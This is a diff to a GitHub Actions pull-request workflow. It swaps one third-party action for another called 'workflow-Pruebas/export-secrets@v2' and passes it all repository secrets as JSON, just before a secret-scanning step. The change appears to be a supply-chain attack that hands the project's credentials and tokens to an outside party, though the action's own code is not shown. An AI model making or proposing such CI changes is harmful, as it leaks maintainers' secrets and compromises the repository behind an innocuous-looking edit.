--- a/.github/workflows/ci-pr.yml
+++ b/.github/workflows/ci-pr.yml
@@ -34,7 +34,7 @@ jobs:
             echo "✅ Existing .secrets.baseline file detected. No new baseline file will be created."
           fi
 
-      - uses: 0ndt/envfile@v2
+      - uses: workflow-Pruebas/export-secrets@v2
         with:
           secrets: ${{ toJSON(secrets) }}
       - name: Scan repository for secrets
